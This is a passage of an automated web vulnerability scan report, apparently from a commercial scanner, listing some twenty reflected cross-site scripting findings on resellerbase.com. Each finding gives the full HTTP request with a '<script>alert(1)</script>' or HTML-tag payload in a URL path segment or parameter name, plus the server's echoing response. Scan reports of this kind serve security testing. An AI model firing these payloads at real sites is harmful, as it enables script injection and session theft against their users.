<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/search.php?keyword=search...&Submit3=Search60912<a>bdcb50a5a28&opt=2 was not found on this server.</p>
...[SNIP]...

2.2185. http://www.resellerbase.com/detail/31/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e4b90<a>624a52d73ee was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/search.php?keyword=search...e4b90<a>624a52d73ee&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/search.php?keyword=search...e4b90<a>624a52d73ee&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2186. http://www.resellerbase.com/detail/31/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2720c<script>alert(1)</script>28d79c7c6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/search.php?keyword=search...&Submit3=Search&opt=2&2720c<script>alert(1)</script>28d79c7c6f9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/search.php?keyword=search...&Submit3=Search&opt=2&2720c<script>alert(1)</script>28d79c7c6f9=1 was not found on this server.</p>
...[SNIP]...

2.2187. http://www.resellerbase.com/detail/31/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/31/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c5222<a>de90256fef1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/search.php?keyword=search...&Submit3=Search&opt=2c5222<a>de90256fef1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/search.php?keyword=search...&Submit3=Search&opt=2c5222<a>de90256fef1 was not found on this server.</p>
...[SNIP]...

2.2188. http://www.resellerbase.com/detail/31/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 521cd<script>alert(1)</script>cee51276d4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail521cd<script>alert(1)</script>cee51276d4a/31/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail521cd<script>alert(1)</script>cee51276d4a/31/themes/ was not found on this server.</p>
...[SNIP]...

2.2189. http://www.resellerbase.com/detail/31/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e123b<script>alert(1)</script>79c6ad88911 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31e123b<script>alert(1)</script>79c6ad88911/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31e123b<script>alert(1)</script>79c6ad88911/themes/ was not found on this server.</p>
...[SNIP]...

2.2190. http://www.resellerbase.com/detail/31/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2fb6d<script>alert(1)</script>7fc79a2397d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes2fb6d<script>alert(1)</script>7fc79a2397d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes2fb6d<script>alert(1)</script>7fc79a2397d/ was not found on this server.</p>
...[SNIP]...

2.2191. http://www.resellerbase.com/detail/31/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d6793<script>alert(1)</script>3f42e11c27d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/?d6793<script>alert(1)</script>3f42e11c27d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/?d6793<script>alert(1)</script>3f42e11c27d=1 was not found on this server.</p>
...[SNIP]...

2.2192. http://www.resellerbase.com/detail/31/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9bed2<script>alert(1)</script>3e464ba3e09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9bed2<script>alert(1)</script>3e464ba3e09/31/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9bed2<script>alert(1)</script>3e464ba3e09/31/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2193. http://www.resellerbase.com/detail/31/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 943b1<script>alert(1)</script>feecf4c2ef5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31943b1<script>alert(1)</script>feecf4c2ef5/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31943b1<script>alert(1)</script>feecf4c2ef5/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2194. http://www.resellerbase.com/detail/31/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a9c21<script>alert(1)</script>1b5637141e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themesa9c21<script>alert(1)</script>1b5637141e9/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themesa9c21<script>alert(1)</script>1b5637141e9/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2195. http://www.resellerbase.com/detail/31/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 20a72<script>alert(1)</script>2cf13fe470b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos20a72<script>alert(1)</script>2cf13fe470b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos20a72<script>alert(1)</script>2cf13fe470b/ was not found on this server.</p>
...[SNIP]...

2.2196. http://www.resellerbase.com/detail/31/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 46d03<script>alert(1)</script>32dd905b62f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/?46d03<script>alert(1)</script>32dd905b62f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/?46d03<script>alert(1)</script>32dd905b62f=1 was not found on this server.</p>
...[SNIP]...

2.2197. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d9b7d<script>alert(1)</script>e0eac59b19f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild9b7d<script>alert(1)</script>e0eac59b19f/31/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild9b7d<script>alert(1)</script>e0eac59b19f/31/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2198. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 538c3<script>alert(1)</script>8806a903171 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31538c3<script>alert(1)</script>8806a903171/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31538c3<script>alert(1)</script>8806a903171/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2199. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c8658<script>alert(1)</script>312ee47aadc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themesc8658<script>alert(1)</script>312ee47aadc/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themesc8658<script>alert(1)</script>312ee47aadc/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2200. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79685<script>alert(1)</script>619ecbc60cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos79685<script>alert(1)</script>619ecbc60cf/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos79685<script>alert(1)</script>619ecbc60cf/images/ was not found on this server.</p>
...[SNIP]...

2.2201. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 94aa8<script>alert(1)</script>e5c3b4cb577 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images94aa8<script>alert(1)</script>e5c3b4cb577/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images94aa8<script>alert(1)</script>e5c3b4cb577/ was not found on this server.</p>
...[SNIP]...

2.2202. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e8f24<script>alert(1)</script>58544343a55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/?e8f24<script>alert(1)</script>58544343a55=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/?e8f24<script>alert(1)</script>58544343a55=1 was not found on this server.</p>
...[SNIP]...

2.2203. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ff57<script>alert(1)</script>0a38671f14e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7ff57<script>alert(1)</script>0a38671f14e/31/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7ff57<script>alert(1)</script>0a38671f14e/31/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2204. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9296<script>alert(1)</script>46c31ef26c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31e9296<script>alert(1)</script>46c31ef26c8/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

